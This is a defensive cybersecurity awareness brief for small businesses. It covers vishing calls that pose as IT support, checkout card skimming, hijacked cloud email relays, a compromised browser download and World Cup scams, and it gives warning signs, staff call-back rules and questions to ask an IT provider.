Today’s SMB cyber lookout: vishing “IT support” calls, payment skimming, and cloud email relays

Today’s look-out: Social engineering for remote access + payment/checkout skimming + cloud/email abuse

What to look out for today

Today’s theme is attackers using social engineering and trusted services to get access, steal data or abuse your systems:

Voice phishing (vishing) pretending to be IT support to persuade staff to start screen-sharing and install remote tools (reported in targeted campaigns against professional services).
Online payment/checkout card theft where criminals hide skimming and data collection behind legitimate infrastructure (a campaign abusing Stripe’s API infrastructure has been reported).
Cloud servers hijacked and used as “quiet” email relays (SMTP proxies) across AWS/Azure/Google Cloud—this can link to account compromise, unexpected email sending, and domain/IP reputation damage.
Software supply-chain compromise (a Windows browser download compromised to deliver a cryptominer), reminding SMEs to treat “free tools” and browser installs as a real risk.
Event-themed scams (World Cup 2026) that can spill into workplaces via personal devices, phishing and account takeovers.

Why this matters to smaller businesses

One convincing call can bypass email security: if a user is talked into screen-sharing or installing a remote tool, attackers may gain access without sending a “malicious” attachment.
E-commerce and donation pages are high-value: if your checkout is skimmed, you may face chargebacks, customer complaints, and reporting obligations—even if the attacker used a trusted platform in the background.
Cloud misuse can look like “normal IT”: hijacked servers relaying email may only show up as odd billing, spam complaints, or Microsoft/Google warnings about sending reputation.
Supplier and app trust is a weak spot: a compromised browser/app installer can introduce unwanted software and performance issues, and sometimes is a stepping-stone to wider compromise.

Warning signs

Staff receive an unexpected call claiming to be “IT”, “Microsoft/Google”, your “MSP”, or a “data migration” team asking for urgent screen share.
Any request to install “remote support”, “RMM”, “security update tool”, or to approve a sign-in/MFA prompt while on the phone.
New or unexplained admin tools appearing on PCs (remote control apps, monitoring agents) or new browser extensions.
Website checkout anomalies: sudden checkout page changes, unfamiliar scripts, customer reports of fraud after buying/donating, increased chargebacks.
Email oddities: spikes in outbound email, unusual “sent” items, mail delivery blocks, or warnings about spam/reputation from your email provider.
PCs becoming unusually slow/hot or fans running constantly (possible miner/unwanted software).
World Cup/streaming links shared in chat, or staff installing “streaming apps” on work devices.

How attackers may exploit the situation

Vishing playbooks: attackers use invoice/data-migration pretexts to get a conversation going, then steer users into screen-sharing and installing remote access tools to capture credentials and data.
Payment skimming via trusted infrastructure: criminals may hide card-stealing and data collection in ways that make it harder for basic website checks to spot, increasing dwell time.
Cloud/email relay abuse: compromised cloud accounts/servers can be repurposed to send email through your infrastructure, which can support phishing, fraud and business email compromise, while harming deliverability for your legitimate mail.
Compromised downloads: users installing a browser/tool from what looks like the normal source can end up running additional unwanted software (e.g., a cryptominer), creating performance issues and increasing risk.

What to do today

Brief staff (2 minutes): “No screen-sharing or remote tool installs from inbound calls. Hang up and ring IT/MSP back using a known number.”
Set a ‘call-back’ rule for finance, HR and reception/admin teams (the usual first targets).
Check your website checkout: ensure only expected scripts run on payment/checkout pages; review recent site/plugin/theme changes; confirm who can deploy changes and whether MFA is enforced.
Review cloud and email activity: look for new access keys, new outbound mail patterns, or unexpected instances/servers; ensure alerts are enabled for suspicious sign-ins.
Control software installs: restrict who can install browsers/extensions; remove unapproved remote access tools and extensions.
If you use WordPress: confirm you know who owns plugin updates and monitoring, especially for forms and checkout components.

Ask your IT provider

“Do we have a documented procedure for inbound ‘IT support’ calls, and do staff know the rule to call back on a known number?”
“Can you show me recent remote access tool installs and confirm only approved tools are allowed?”
“Do we monitor unusual outbound email and cloud activity (new logins/keys/servers), and who gets the alerts?”
“For our website/checkout: who monitors for unexpected script changes and how quickly would we know if card skimming was suspected?”
“Do we have a browser extension policy and reporting route for suspicious extensions or sudden device slowness?”

Patch watch - only one short paragraph, and only if relevant

If you run a WordPress site, pay extra attention to forms plugins: there are reports of active exploitation of a critical flaw in the Everest Forms Pro plugin. Even if you outsource your website, confirm today who is responsible for urgent plugin updates and how quickly they can react if a plugin is being exploited in the wild.

One action today

Send a same-day staff note: ‘If “IT support” calls you, do not screen-share or install tools—hang up and call IT/MSP back on the number in our directory.’

Related Actions On Cyber resource

CTA: Use the Actions On Cyber ‘Stop vishing & remote-access scams’ mini-checklist (staff call-back rule + approved remote tools + reporting steps).

Sources

Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms (Google Threat Intelligence)
Credit card theft campaign abuses Stripe to host stolen payment info (BleepingComputer)
PCPJack Hijacks 230 AWS, Google Cloud, and Azure Servers for Covert SMTP Relay Network (The Hacker News)
Hola Browser for Windows compromised to deliver cryptominer (BleepingComputer)
FIFA World Cup 2026 Scams Are Already Live: Fake Sites, Banking Malware, and Stolen Logins (The Hacker News)
Hackers Exploit Critical Everest Forms Pro WordPress Plugin Flaw to Take Over Sites (The Hacker News)

This brief is for general awareness and does not replace advice from your IT provider, legal adviser, insurer or incident response specialist.